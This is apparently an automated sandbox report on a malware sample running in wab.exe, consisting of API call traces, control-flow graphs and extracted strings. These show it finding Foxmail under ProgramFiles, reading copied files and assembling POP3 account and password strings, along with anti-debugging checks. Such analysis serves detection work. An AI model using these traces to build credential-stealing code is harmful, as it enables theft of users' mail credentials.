                                                                                                                • lstrlenW.KERNEL32(?,?), ref: 22C9150F
                                                                                                                • lstrcatW.KERNEL32(00000000), ref: 22C91521
                                                                                                                • lstrlenW.KERNEL32(?,?), ref: 22C91547
                                                                                                                • lstrcatW.KERNEL32(00000000), ref: 22C91553
                                                                                                                • lstrlenW.KERNEL32(?,?), ref: 22C91579
                                                                                                                • lstrcatW.KERNEL32(00000000), ref: 22C91585
                                                                                                                • lstrlenW.KERNEL32(?,?), ref: 22C915AB
                                                                                                                • lstrcatW.KERNEL32(00000000), ref: 22C915B7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                                                • String ID: )$Foxmail$ProgramFiles
                                                                                                                • API String ID: 672098462-2938083778
                                                                                                                • Opcode ID: c68e3b91b927777a7498becdd7e905e959d8616c0286c76b1cf9ea112295b710
                                                                                                                • Instruction ID: 008e78e2f3e67f500d6ee2d81d0d292487d6d9b601ec12f03bb010bc1899354b
                                                                                                                • Opcode Fuzzy Hash: c68e3b91b927777a7498becdd7e905e959d8616c0286c76b1cf9ea112295b710
                                                                                                                • Instruction Fuzzy Hash: A981B471A4035CA9EB20DBA0DC85FEF737DEF84700F00159AF509E72A0EAB15A84CB95
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNEL32(22C9C7DD), ref: 22C9C7E6
                                                                                                                • GetModuleHandleA.KERNEL32(?,22C9C7DD), ref: 22C9C838
                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 22C9C860
                                                                                                                  • Part of subcall function 22C9C803: GetProcAddress.KERNEL32(00000000,22C9C7F4), ref: 22C9C804
                                                                                                                  • Part of subcall function 22C9C803: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,22C9C7F4,22C9C7DD), ref: 22C9C816
                                                                                                                  • Part of subcall function 22C9C803: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,22C9C7F4,22C9C7DD), ref: 22C9C82A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 2099061454-0
                                                                                                                • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                • Instruction ID: 189caef9c6441aab1aa16ed2190f8c5a5ca19f685e70b72a91793e1a1433dfd3
                                                                                                                • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                • Instruction Fuzzy Hash: 2E012E30945380F8AB108374CD04ABA6FD89FAF6A8B101B96E20086093C9A08302C3AE
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNEL32(?,22C9C7DD), ref: 22C9C838
                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 22C9C860
                                                                                                                  • Part of subcall function 22C9C7E6: GetModuleHandleA.KERNEL32(22C9C7DD), ref: 22C9C7E6
                                                                                                                  • Part of subcall function 22C9C7E6: GetProcAddress.KERNEL32(00000000,22C9C7F4), ref: 22C9C804
                                                                                                                  • Part of subcall function 22C9C7E6: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,22C9C7F4,22C9C7DD), ref: 22C9C816
                                                                                                                  • Part of subcall function 22C9C7E6: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,22C9C7F4,22C9C7DD), ref: 22C9C82A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 2099061454-0
                                                                                                                • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                • Instruction ID: 8b6343d092cfcb481db9e31fec5168b9777f320ea18079c93c0d31feb00b0a04
                                                                                                                • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                • Instruction Fuzzy Hash: F021F172449381EFE7118BB4CD04BB66FD89F9F2A4F190A96D140CB183D5A98746C3AA
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • GetProcAddress.KERNEL32(00000000,22C9C7F4), ref: 22C9C804
                                                                                                                • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,22C9C7F4,22C9C7DD), ref: 22C9C816
                                                                                                                • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,22C9C7F4,22C9C7DD), ref: 22C9C82A
                                                                                                                • GetModuleHandleA.KERNEL32(?,22C9C7DD), ref: 22C9C838
                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 22C9C860
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                                • String ID:
                                                                                                                • API String ID: 2152742572-0
                                                                                                                • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                • Instruction ID: 432778a9b77eb464975ba571c4f53319fd0cdfe79d7408bf89739dc1ee974f4f
                                                                                                                • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                • Instruction Fuzzy Hash: B4F0A9B1689380FCFA1147B58D45EBA5FCC8FAF6A4B101A56E210C7183D8A5870683FE
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 22C961DA
                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 22C961E4
                                                                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 22C961F1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                • String ID:
                                                                                                                • API String ID: 3906539128-0
                                                                                                                • Opcode ID: 6d3541609b0cd1863790063bdc60639d1d5cc76259811c9cc9bb88bad69a830c
                                                                                                                • Instruction ID: daebd36b0abc220bca5dc4ab3c001c1d0e164356f88a3b47c5f681aa836a6d05
                                                                                                                • Opcode Fuzzy Hash: 6d3541609b0cd1863790063bdc60639d1d5cc76259811c9cc9bb88bad69a830c
                                                                                                                • Instruction Fuzzy Hash: FE31E57494131C9BCB21DF24D988B9DBBB8BF08310F5042DAE85CA7290E7749B81CF45
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32(?,?,22C94A8A,?,22CA2238,0000000C,22C94BBD,00000000,00000000,?,22C92082,22CA2108,0000000C,22C91F3A,?), ref: 22C94AD5
                                                                                                                • TerminateProcess.KERNEL32(00000000,?,22C94A8A,?,22CA2238,0000000C,22C94BBD,00000000,00000000,?,22C92082,22CA2108,0000000C,22C91F3A,?), ref: 22C94ADC
                                                                                                                • ExitProcess.KERNEL32 ref: 22C94AEE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                                • String ID:
                                                                                                                • API String ID: 1703294689-0
                                                                                                                • Opcode ID: 41027143e2667c463b76587c55840f2eab618cf170525a99df58e626e84a73fa
                                                                                                                • Instruction ID: 3d569ab9edba93e6d90d7fb7348a4508d456c4c6447a2bf845f9b73fb336cd27
                                                                                                                • Opcode Fuzzy Hash: 41027143e2667c463b76587c55840f2eab618cf170525a99df58e626e84a73fa
                                                                                                                • Instruction Fuzzy Hash: 75E04636040348AFCF117F24CE0CE6A3B2AEF40341B504510FE089B021DB39E942DA84
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 22C96AF0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Info
                                                                                                                • String ID:
                                                                                                                • API String ID: 1807457897-3916222277
                                                                                                                • Opcode ID: 3eb9d7c85178847ea49f5561548706516414c38004e21dbb7cb81a07944a4923
                                                                                                                • Instruction ID: a1572bf017b59fb7e7a6b8004ae50cff41dd6316ec2082f875d3c49e58a8df35
                                                                                                                • Opcode Fuzzy Hash: 3eb9d7c85178847ea49f5561548706516414c38004e21dbb7cb81a07944a4923
                                                                                                                • Instruction Fuzzy Hash: 724158B05043CC9ADB228F24CD84FF6BBE9EB55308F2405EDE58987182E235AA45DF60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: .
                                                                                                                • API String ID: 0-248832578
                                                                                                                • Opcode ID: f1fff4fee63a94da89378ff1b3fb272b0e330f2cbdd043076aa4ee7d3e20afa1
                                                                                                                • Instruction ID: c9d245e08544bfc0a1d02ab30b0be254b37f0f9ae815e742865e18536d406583
                                                                                                                • Opcode Fuzzy Hash: f1fff4fee63a94da89378ff1b3fb272b0e330f2cbdd043076aa4ee7d3e20afa1
                                                                                                                • Instruction Fuzzy Hash: A031F671900389AFDB14AF78CD84EFA7BBDDB85304F2002ACE919D7295E6319A45CB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HeapProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 54951025-0
                                                                                                                • Opcode ID: 37fa8d6b96e4d0a99e8df2f68a6a8ff69caf6a483512f4d3c1521a1b534d7ff8
                                                                                                                • Instruction ID: 7387d945b7a02cfccdbc30c7148b04bb0b536bf68e00ace582f507ca0fdc3bf4
                                                                                                                • Opcode Fuzzy Hash: 37fa8d6b96e4d0a99e8df2f68a6a8ff69caf6a483512f4d3c1521a1b534d7ff8
                                                                                                                • Instruction Fuzzy Hash: 2BA011302802028F83008EBA8B0E20C3AAEAA002803000AA8AC08CB008EB2880208A02
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                control_flow_graph 150 22c9173a-22c917fe call 22c9c030 call 22c92c40 * 2 157 22c91803 call 22c91cca 150->157 158 22c91808-22c9180c 157->158 159 22c919ad-22c919b1 158->159 160 22c91812-22c91816 158->160 160->159 161 22c9181c-22c91837 call 22c91ede 160->161 164 22c9183d-22c91845 161->164 165 22c9199f-22c919ac call 22c91ee7 * 2 161->165 166 22c9184b-22c9184e 164->166 167 22c91982-22c91985 164->167 165->159 166->167 171 22c91854-22c91881 call 22c944b0 * 2 call 22c91db7 166->171 169 22c91995-22c91999 167->169 170 22c91987 167->170 169->164 169->165 173 22c9198a-22c9198d call 22c92c40 170->173 184 22c9193d-22c91943 171->184 185 22c91887-22c9189f call 22c944b0 call 22c91db7 171->185 179 22c91992 173->179 179->169 186 22c9197e-22c91980 184->186 187 22c91945-22c91947 184->187 185->184 198 22c918a5-22c918a8 185->198 186->173 187->186 189 22c91949-22c9194b 187->189 191 22c9194d-22c9194f 189->191 192 22c91961-22c9197c call 22c916aa 189->192 194 22c91951-22c91953 191->194 195 22c91955-22c91957 191->195 192->179 194->192 194->195 199 22c91959-22c9195b 195->199 200 22c9195d-22c9195f 195->200 202 22c918aa-22c918c2 call 22c944b0 call 22c91db7 198->202 203 22c918c4-22c918dc call 22c944b0 call 22c91db7 198->203 199->192 199->200 200->186 200->192 202->203 212 22c918e2-22c9193b call 22c916aa call 22c915da call 22c92c40 * 2 202->212 203->169 203->212 212->169
                                                                                                                APIs
                                                                                                                  • Part of subcall function 22C91CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 22C91D1B
                                                                                                                  • Part of subcall function 22C91CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 22C91D37
                                                                                                                  • Part of subcall function 22C91CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22C91D4B
                                                                                                                • _strlen.LIBCMT ref: 22C91855
                                                                                                                • _strlen.LIBCMT ref: 22C91869
                                                                                                                • _strlen.LIBCMT ref: 22C9188B
                                                                                                                • _strlen.LIBCMT ref: 22C918AE
                                                                                                                • _strlen.LIBCMT ref: 22C918C8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _strlen$File$CopyCreateDelete
                                                                                                                • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                                                                • API String ID: 3296212668-3023110444
                                                                                                                • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                • Instruction ID: 845bdb81ea8f407ba570326f092d52247b02d45a61420e920b5d8f030f75a762
                                                                                                                • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                • Instruction Fuzzy Hash: B6610371D00318AFEF11CBA4C942BFEB7B9AF55308F004196D244AB3A4EBB45A46CB56
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _strlen
                                                                                                                • String ID: %m$~$Gon~$~F@7$~dra
                                                                                                                • API String ID: 4218353326-230879103
                                                                                                                • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                • Instruction ID: ddb66299eb12c54b541b1f8f2fe9b66fcf7c8225a8dbe2a8f8e0f3877952dab1
                                                                                                                • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                • Instruction Fuzzy Hash: 5E71F5B1D003685BDB119BB59C84AFF7BFCAF59704F104096E644E7241EAB4DB85CBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                control_flow_graph 290 22c97cc2-22c97cd6 291 22c97cd8-22c97cdd 290->291 292 22c97d44-22c97d4c 290->292 291->292 295 22c97cdf-22c97ce4 291->295 293 22c97d4e-22c97d51 292->293 294 22c97d93-22c97dab call 22c97e35 292->294 293->294 296 22c97d53-22c97d90 call 22c9571e * 4 293->296 302 22c97dae-22c97db5 294->302 295->292 298 22c97ce6-22c97ce9 295->298 296->294 298->292 301 22c97ceb-22c97cf3 298->301 303 22c97d0d-22c97d15 301->303 304 22c97cf5-22c97cf8 301->304 306 22c97dd4-22c97dd8 302->306 307 22c97db7-22c97dbb 302->307 309 22c97d2f-22c97d43 call 22c9571e * 2 303->309 310 22c97d17-22c97d1a 303->310 304->303 308 22c97cfa-22c97d0c call 22c9571e call 22c990ba 304->308 317 22c97dda-22c97ddf 306->317 318 22c97df0-22c97dfc 306->318 312 22c97dbd-22c97dc0 307->312 313 22c97dd1 307->313 308->303 309->292 310->309 315 22c97d1c-22c97d2e call 22c9571e call 22c991b8 310->315 312->313 321 22c97dc2-22c97dd0 call 22c9571e * 2 312->321 313->306 315->309 325 22c97ded 317->325 326 22c97de1-22c97de4 317->326 318->302 320 22c97dfe-22c97e0b call 22c9571e 318->320 321->313 325->318 326->325 334 22c97de6-22c97dec call 22c9571e 326->334 334->325
                                                                                                                APIs
                                                                                                                • ___free_lconv_mon.LIBCMT ref: 22C97D06
                                                                                                                  • Part of subcall function 22C990BA: _free.LIBCMT ref: 22C990D7
                                                                                                                  • Part of subcall function 22C990BA: _free.LIBCMT ref: 22C990E9
                                                                                                                  • Part of subcall function 22C990BA: _free.LIBCMT ref: 22C990FB
                                                                                                                  • Part of subcall function 22C990BA: _free.LIBCMT ref: 22C9910D
                                                                                                                  • Part of subcall function 22C990BA: _free.LIBCMT ref: 22C9911F
                                                                                                                  • Part of subcall function 22C990BA: _free.LIBCMT ref: 22C99131
                                                                                                                  • Part of subcall function 22C990BA: _free.LIBCMT ref: 22C99143
                                                                                                                  • Part of subcall function 22C990BA: _free.LIBCMT ref: 22C99155
                                                                                                                  • Part of subcall function 22C990BA: _free.LIBCMT ref: 22C99167
                                                                                                                  • Part of subcall function 22C990BA: _free.LIBCMT ref: 22C99179
                                                                                                                  • Part of subcall function 22C990BA: _free.LIBCMT ref: 22C9918B
                                                                                                                  • Part of subcall function 22C990BA: _free.LIBCMT ref: 22C9919D
                                                                                                                  • Part of subcall function 22C990BA: _free.LIBCMT ref: 22C991AF
                                                                                                                • _free.LIBCMT ref: 22C97CFB
                                                                                                                  • Part of subcall function 22C9571E: HeapFree.KERNEL32(00000000,00000000,?,22C9924F,?,00000000,?,00000000,?,22C99276,?,00000007,?,?,22C97E5A,?), ref: 22C95734
                                                                                                                  • Part of subcall function 22C9571E: GetLastError.KERNEL32(?,?,22C9924F,?,00000000,?,00000000,?,22C99276,?,00000007,?,?,22C97E5A,?,?), ref: 22C95746
                                                                                                                • _free.LIBCMT ref: 22C97D1D
                                                                                                                • _free.LIBCMT ref: 22C97D32
                                                                                                                • _free.LIBCMT ref: 22C97D3D
                                                                                                                • _free.LIBCMT ref: 22C97D5F
                                                                                                                • _free.LIBCMT ref: 22C97D72
                                                                                                                • _free.LIBCMT ref: 22C97D80
                                                                                                                • _free.LIBCMT ref: 22C97D8B
                                                                                                                • _free.LIBCMT ref: 22C97DC3
                                                                                                                • _free.LIBCMT ref: 22C97DCA
                                                                                                                • _free.LIBCMT ref: 22C97DE7
                                                                                                                • _free.LIBCMT ref: 22C97DFF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                • String ID:
                                                                                                                • API String ID: 161543041-0
                                                                                                                • Opcode ID: 245d93a52396b2feac493b80fd618ce2458303cebfb4772f73f2f090e52bcd4b
                                                                                                                • Instruction ID: 35190b7a88c611e72275187ef6578d2868ab5476e93c5dea6f809092caf95794
                                                                                                                • Opcode Fuzzy Hash: 245d93a52396b2feac493b80fd618ce2458303cebfb4772f73f2f090e52bcd4b
                                                                                                                • Instruction Fuzzy Hash: FC316DB2611345DFEB219B38DA44BB6B7E9FF80354F104869E849DB191DF32AA94CB10
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • _free.LIBCMT ref: 22C959EA
                                                                                                                  • Part of subcall function 22C9571E: HeapFree.KERNEL32(00000000,00000000,?,22C9924F,?,00000000,?,00000000,?,22C99276,?,00000007,?,?,22C97E5A,?), ref: 22C95734
                                                                                                                  • Part of subcall function 22C9571E: GetLastError.KERNEL32(?,?,22C9924F,?,00000000,?,00000000,?,22C99276,?,00000007,?,?,22C97E5A,?,?), ref: 22C95746
                                                                                                                • _free.LIBCMT ref: 22C959F6
                                                                                                                • _free.LIBCMT ref: 22C95A01
                                                                                                                • _free.LIBCMT ref: 22C95A0C
                                                                                                                • _free.LIBCMT ref: 22C95A17
                                                                                                                • _free.LIBCMT ref: 22C95A22
                                                                                                                • _free.LIBCMT ref: 22C95A2D
                                                                                                                • _free.LIBCMT ref: 22C95A38
                                                                                                                • _free.LIBCMT ref: 22C95A43
                                                                                                                • _free.LIBCMT ref: 22C95A51
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 776569668-0
                                                                                                                • Opcode ID: 340b08e32e708cdd677e15571e695117dc8862c5ac83d78b16d5d50c6fb5d402
                                                                                                                • Instruction ID: 3d647b77690fd939169bebbe795ba3edbd39d5a1cdf87ec48a276e03d0d4f9fa
                                                                                                                • Opcode Fuzzy Hash: 340b08e32e708cdd677e15571e695117dc8862c5ac83d78b16d5d50c6fb5d402
                                                                                                                • Instruction Fuzzy Hash: 3411427A520348EFCB21DF94D941DED3FA9EF14390B5541A5BA088F225DA32EB509B80
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DecodePointer
                                                                                                                • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                • API String ID: 3527080286-3064271455
                                                                                                                • Opcode ID: 266efc7f2735567b61a414aa9099ba4377762841174e830123230d5de7940f76
                                                                                                                • Instruction ID: 874f76b31cc9e63914070b8a7f0c2cdbc769c8929c27b0e40fd8d6dd4f304b88
                                                                                                                • Opcode Fuzzy Hash: 266efc7f2735567b61a414aa9099ba4377762841174e830123230d5de7940f76
                                                                                                                • Instruction Fuzzy Hash: 8651517190470ACBCF00DFA5EA885FC7FB5FF49314F104685E581AB264CB7A8A24CB18
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 22C91D1B
                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 22C91D37
                                                                                                                • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22C91D4B
                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22C91D58
                                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22C91D72
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22C91D7D
                                                                                                                • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22C91D8A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
